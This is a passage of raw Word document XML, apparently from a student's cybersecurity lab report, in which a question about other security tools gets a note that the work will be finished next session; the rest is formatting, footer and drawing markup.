                          <w:spacing w:val="-13"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>a</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>cybersecurity</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-17"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>analyst,</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-13"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>other</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-13"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>than</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-13"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>the</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-13"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve">above tools what are the tools </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-3"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve">you </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>have discovered/ observed/ used/ tried? List them and record their usage, pros and cons comparing to the above listed and above used tools in this</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-1"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>lab.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="00FC4681" w14:textId="69297789" w:rsidR="00F83F1E" w:rsidRDefault="00F83F1E">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="76DBB735" w14:textId="0E27E037" w:rsidR="00F83F1E" w:rsidRDefault="00F83F1E">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Didn’t have time to complete this on time due to the major project and a networking exam by next Monday, but will complete this task by next session.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D02F84">
      <w:pgSz w:w="11910" w:h="16840"/>
      <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="111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714D4C" w14:textId="77777777" w:rsidR="00D42908" w:rsidRDefault="00D42908">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4C8C22A8" w14:textId="77777777" w:rsidR="00D42908" w:rsidRDefault="00D429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rlito">
    <w:altName w:val="Calibri"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>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466AB8" w14:textId="6B727736" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
    <w:pPr>
      <w:pStyle w:val="BodyText"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="487285760" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B68400E" wp14:editId="0BEF03D3">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>914400</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9803765</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5732145" cy="268605"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="4"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32145" cy="268605"/>
                        <a:chOff x="1440" y="15439"/>
                        <a:chExt cx="9027" cy="423"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="6" name="Freeform 5"/>
                      <wps:cNvSpPr>
                        <a:spLocks/>
                      </wps:cNvSpPr>
                      <wps:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="1440" y="15439"/>
                          <a:ext cx="903" cy="423"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 2342 1440"/>
                            <a:gd name="T1" fmla="*/ T0 w 903"/>
                            <a:gd name="T2" fmla="+- 0 15439 15439"/>
                            <a:gd name="T3" fmla="*/ 15439 h 423"/>
                            <a:gd name="T4" fmla="+- 0 1440 1440"/>
                            <a:gd name="T5" fmla="*/ T4 w 903"/>
                            <a:gd name="T6" fmla="+- 0 15439 15439"/>
                            <a:gd name="T7" fmla="*/ 15439 h 423"/>
                            <a:gd name="T8" fmla="+- 0 1440 1440"/>
                            <a:gd name="T9" fmla="*/ T8 w 903"/>
                            <a:gd name="T10" fmla="+- 0 15449 15439"/>
                            <a:gd name="T11" fmla="*/ 15449 h 423"/>
                            <a:gd name="T12" fmla="+- 0 1440 1440"/>
                            <a:gd name="T13" fmla="*/ T12 w 903"/>
                            <a:gd name="T14" fmla="+- 0 15521 15439"/>
                            <a:gd name="T15" fmla="*/ 15521 h 423"/>
                            <a:gd name="T16" fmla="+- 0 1440 1440"/>
                            <a:gd name="T17" fmla="*/ T16 w 903"/>
                            <a:gd name="T18" fmla="+- 0 15862 15439"/>
                            <a:gd name="T19" fmla="*/ 15862 h 423"/>
                            <a:gd name="T20" fmla="+- 0 2342 1440"/>
                            <a:gd name="T21" fmla="*/ T20 w 903"/>
                            <a:gd name="T22" fmla="+- 0 15862 15439"/>
                            <a:gd name="T23" fmla="*/ 15862 h 423"/>
                            <a:gd name="T24" fmla="+- 0 2342 1440"/>
                            <a:gd name="T25" fmla="*/ T24 w 903"/>
                            <a:gd name="T26" fmla="+- 0 15521 15439"/>
                            <a:gd name="T27" fmla="*/ 15521 h 423"/>
                            <a:gd name="T28" fmla="+- 0 2342 1440"/>
                            <a:gd name="T29" fmla="*/ T28 w 903"/>
                            <a:gd name="T30" fmla="+- 0 15449 15439"/>
                            <a:gd name="T31" fmla="*/ 15449 h 423"/>
                            <a:gd name="T32" fmla="+- 0 2342 1440"/>
                            <a:gd name="T33" fmla="*/ T32 w 903"/>
                            <a:gd name="T34" fmla="+- 0 15439 15439"/>
                            <a:gd name="T35" fmla="*/ 15439 h 42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903" h="423">
                              <a:moveTo>
                                <a:pt x="902" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="10"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="82"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="423"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="902" y="423"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="902" y="82"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="902" y="10"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="902" y="0"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:solidFill>
                          <a:srgbClr val="94363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 name="Freeform 4"/>
                      <wps:cNvSpPr>
                        <a:spLocks/>
                      </wps:cNvSpPr>
                      <wps:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="2342" y="15439"/>
                          <a:ext cx="8124" cy="10"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 10466 2342"/>
                            <a:gd name="T1" fmla="*/ T0 w 8124"/>
                            <a:gd name="T2" fmla="+- 0 15439 15439"/>
                            <a:gd name="T3" fmla="*/ 15439 h 10"/>
                            <a:gd name="T4" fmla="+- 0 2352 2342"/>
                            <a:gd name="T5" fmla="*/ T4 w 8124"/>
                            <a:gd name="T6" fmla="+- 0 15439 15439"/>
                            <a:gd name="T7" fmla="*/ 15439 h 10"/>
                            <a:gd name="T8" fmla="+- 0 2342 2342"/>
                            <a:gd name="T9" fmla="*/ T8 w 8124"/>
                            <a:gd name="T10" fmla="+- 0 15439 15439"/>
                            <a:gd name="T11" fmla="*/ 15439 h 10"/>
                            <a:gd name="T12" fmla="+- 0 2342 2342"/>
                            <a:gd name="T13" fmla="*/ T12 w 8124"/>
                            <a:gd name="T14" fmla="+- 0 15449 15439"/>
                            <a:gd name="T15" fmla="*/ 15449 h 10"/>
                            <a:gd name="T16" fmla="+- 0 2352 2342"/>
                            <a:gd name="T17" fmla="*/ T16 w 8124"/>
                            <a:gd name="T18" fmla="+- 0 15449 15439"/>
                            <a:gd name="T19" fmla="*/ 15449 h 10"/>
                            <a:gd name="T20" fmla="+- 0 10466 2342"/>
                            <a:gd name="T21" fmla="*/ T20 w 8124"/>
                            <a:gd name="T22" fmla="+- 0 15449 15439"/>
                            <a:gd name="T23" fmla="*/ 15449 h 10"/>
                            <a:gd name="T24" fmla="+- 0 10466 2342"/>
                            <a:gd name="T25" fmla="*/ T24 w 8124"/>
                            <a:gd name="T26" fmla="+- 0 15439 15439"/>
                            <a:gd name="T27" fmla="*/ 15439 h 10"/>
                          </a:gdLst>
                          <a:ahLst/>
                          <a:cxnLst>
                            <a:cxn ang="0">
                              <a:pos x="T1" y="T3"/>
                            </a:cxn>
                            <a:cxn ang="0">
                              <a:pos x="T5" y="T7"/>
                            </a:cxn>
                            <a:cxn ang="0">
                              <a:pos x="T9" y="T11"/>
                            </a:cxn>
                            <a:cxn ang="0">
                              <a:pos x="T13" y="T15"/>
                            </a:cxn>
                            <a:cxn ang="0">
                              <a:pos x="T17" y="T19"/>
                            </a:cxn>
                            <a:cxn ang="0">
                              <a:pos x="T21" y="T23"/>
                            </a:cxn>
                            <a:cxn ang="0">
                              <a:pos x="T25" y="T27"/>
                            </a:cxn>
                          </a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="8124" h="10">
                              <a:moveTo>
                                <a:pt x="8124" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="10" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="10"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="10" y="10"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="8124" y="10"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="81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 name="Rectangle 3"/>
                      <wps:cNvSpPr>
                        <a:spLocks noChangeArrowheads="1"/>
                      </wps:cNvSpPr>
                      <wps:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="1440" y="15789"/>
                          <a:ext cx="903" cy="72"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="94363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39F0DD6" id="Group 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:771.95pt;width:451.35pt;height:21.15pt;z-index:-16030720;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1440,15439" coordsize="9027,4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&#10;">
              <v:shape id="Freeform 5" o:spid="_x0000_s1027" style="position:absolute;left:1440;top:15439;width:903;height:423;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="903,4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8k15wQAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Li8JA&#10;EITvC/6HoQUvi0508UHMRERQ1qOve5Npk2CmJ2bGGP+9Iyzssaiqr6hk1ZlKtNS40rKC8SgCQZxZ&#10;XXKu4HzaDhcgnEfWWFkmBS9ysEp7XwnG2j75QO3R5yJA2MWooPC+jqV0WUEG3cjWxMG72sagD7LJ&#10;pW7wGeCmkpMomkmDJYeFAmvaFJTdjg+j4D4v9yfPefvYfa/tj7m/LpfpRqlBv1svQXjq/H/4r/2r&#10;FczgcyXcAJm+AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOTyTXnBAAAA2gAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m902,l,,,10,,82,,423r902,l902,82r,-72l902,xe" fillcolor="#943634" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="902,15439;0,15439;0,15449;0,15521;0,15862;902,15862;902,15521;902,15449;902,15439" o:connectangles="0,0,0,0,0,0,0,0,0"/>
              </v:shape>
              <v:shape id="Freeform 4" o:spid="_x0000_s1028" style="position:absolute;left:2342;top:15439;width:8124;height:10;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="812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dwjcvwAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE89b8Iw&#10;EN0r8R+sQ2IrDh3SKmAQIKJ2q0rLfoqPOCI+R7ZJAr++HpAYn973ajPaVvTkQ+NYwWKegSCunG64&#10;VvD3W75+gAgRWWPrmBTcKMBmPXlZYaHdwD/UH2MtUgiHAhWYGLtCylAZshjmriNO3Nl5izFBX0vt&#10;cUjhtpVvWZZLiw2nBoMd7Q1Vl+PVKuhz3V13n6ftwdzLdz985+W9yZWaTcftEkSkMT7FD/eXVpC2&#10;pivpBsj1PwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAAAAAA&#10;AAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBAdwjcvwAAANoAAAAPAAAAAAAA&#10;AAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA8wIAAAAA&#10;" path="m8124,l10,,,,,10r10,l8124,10r,-10xe" fillcolor="black" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8124,15439;10,15439;0,15439;0,15449;10,15449;8124,15449;8124,15439" o:connectangles="0,0,0,0,0,0,0"/>
              </v:shape>
              <v:rect id="Rectangle 3" o:spid="_x0000_s1029" style="position:absolute;left:1440;top:15789;width:903;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7TkwgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvQv/DMgVvuqlKKambIKWCoJeq7XnIjkkwO5tm1yT+e+dQ6G2G9+a9b9b56BrVUxdqzwZe5gko&#10;4sLbmksD59N29gYqRGSLjWcycKcAefY0WWNq/cBf1B9jqSSEQ4oGqhjbVOtQVOQwzH1LLNrFdw6j&#10;rF2pbYeDhLtGL5LkVTusWRoqbOmjouJ6vDkDn9/9uC+jW25o+FnZA+Fp53+NmT6Pm3dQkcb4b/67&#10;3lnBF3r5RQbQ2QMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBOI7TkwgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="#943634" stroked="f"/>
              <w10:wrap anchorx="page" anchory="page"/>
            </v:group>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="487286272" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="696E535E" wp14:editId="6BACDC1E">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>1234440</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9870440</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="219710"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3BAAB9" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                          <w:pPr>
                            <w:spacing w:line="245" w:lineRule="exact"/>
                            <w:ind w:left="60"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Carlito"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Carlito"/>
                              <w:color w:val="FFFFFF"/>
                            </w:rPr>
                            <w:instrText xml:space="preserve"> PAGE </w:instrText>
                          </w:r>
                          <w:r>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r>
                            <w:t>10</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96E535E" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Text Box 1" o:spid="_x0000_s1050" type="#_x0000_t202" style="position:absolute;margin-left:97.2pt;margin-top:777.2pt;width:17.3pt;height:13.05pt;z-index:-160302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s4we6AEAALwDAAAOAAAAZHJzL2Uyb0RvYy54bWysU9tu1DAQfUfiHyy/s9ksagvRZqvSqgip&#10;XKSWD3AcO7GIPWbs3WT5esbOZinwhnixxnM5PnNmvL2e7MAOCoMBV/NyteZMOQmtcV3Nvz7dv3rD&#10;WYjCtWIAp2p+VIFf716+2I6+UhvoYWgVMgJxoRp9zfsYfVUUQfbKirACrxwFNaAVka7YFS2KkdDt&#10;UGzW68tiBGw9glQhkPduDvJdxtdayfhZ66AiG2pO3GI+MZ9NOovdVlQdCt8beaIh/oGFFcbRo2eo&#10;OxEF26P5C8oaiRBAx5UEW4DWRqrcA3VTrv/o5rEXXuVeSJzgzzKF/wcrPx2+IDNtzTecOWFpRE9q&#10;iuwdTKxM6ow+VJT06CktTuSmKedOg38A+S0wB7e9cJ26QYSxV6IldrmyeFY644QE0owfoaVnxD5C&#10;Bpo02iQdicEInaZ0PE8mUZHk3JRvr0qKSAqVlxdXry8St0JUS7HHEN8rsCwZNUcafAYXh4cQ59Ql&#10;Jb3l4N4MQx7+4H5zEGbyZPKJ78w8Ts2UVTpr0kB7pG4Q5pWiL0BGD/iDs5HWqebh+16g4mz44EiR&#10;tHuLgYvRLIZwkkprHjmbzds47+jeo+l6Qp41d3BDqmmTO0ryzixOdGlFsiandU47+Pyes359ut1P&#10;AAAA//8DAFBLAwQUAAYACAAAACEA5upB/t4AAAANAQAADwAAAGRycy9kb3ducmV2LnhtbExPQU7D&#10;MBC8I/EHa5G4UZuoqZoQp6oQnJAQaThwdGI3sRqvQ+y24fdsTnCb2RnNzhS72Q3sYqZgPUp4XAlg&#10;BluvLXYSPuvXhy2wEBVqNXg0En5MgF15e1OoXPsrVuZyiB2jEAy5ktDHOOach7Y3ToWVHw2SdvST&#10;U5Ho1HE9qSuFu4EnQmy4UxbpQ69G89yb9nQ4Own7L6xe7Pd781EdK1vXmcC3zUnK+7t5/wQsmjn+&#10;mWGpT9WhpE6NP6MObCCerddkJZCmCyJLkmQ0r1lOW5ECLwv+f0X5CwAA//8DAFBLAQItABQABgAI&#10;AAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsB&#10;Ai0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsB&#10;Ai0AFAAGAAgAAAAhADWzjB7oAQAAvAMAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1s&#10;UEsBAi0AFAAGAAgAAAAhAObqQf7eAAAADQEAAA8AAAAAAAAAAAAAAAAAQgQAAGRycy9kb3ducmV2&#10;LnhtbFBLBQYAAAAABAAEAPMAAABNBQAAAAA=&#10;" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="0E3BAAB9" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                    <w:pPr>
                      <w:spacing w:line="245" w:lineRule="exact"/>
                      <w:ind w:left="60"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Carlito"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:fldChar w:fldCharType="begin"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Carlito"/>
                        <w:color w:val="FFFFFF"/>
                      </w:rPr>
                      <w:instrText xml:space="preserve"> PAGE </w:instrText>
                    </w:r>
                    <w:r>
                      <w:fldChar w:fldCharType="separate"/>
                    </w:r>
                    <w:r>
                      <w:t>10</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82BA71" w14:textId="77777777" w:rsidR="00D42908" w:rsidRDefault="00D42908">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="512ABD0A" w14:textId="77777777" w:rsidR="00D42908" w:rsidRDefault="00D429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35ACAD" w14:textId="3C1171DE" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
    <w:pPr>
      <w:pStyle w:val="BodyText"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
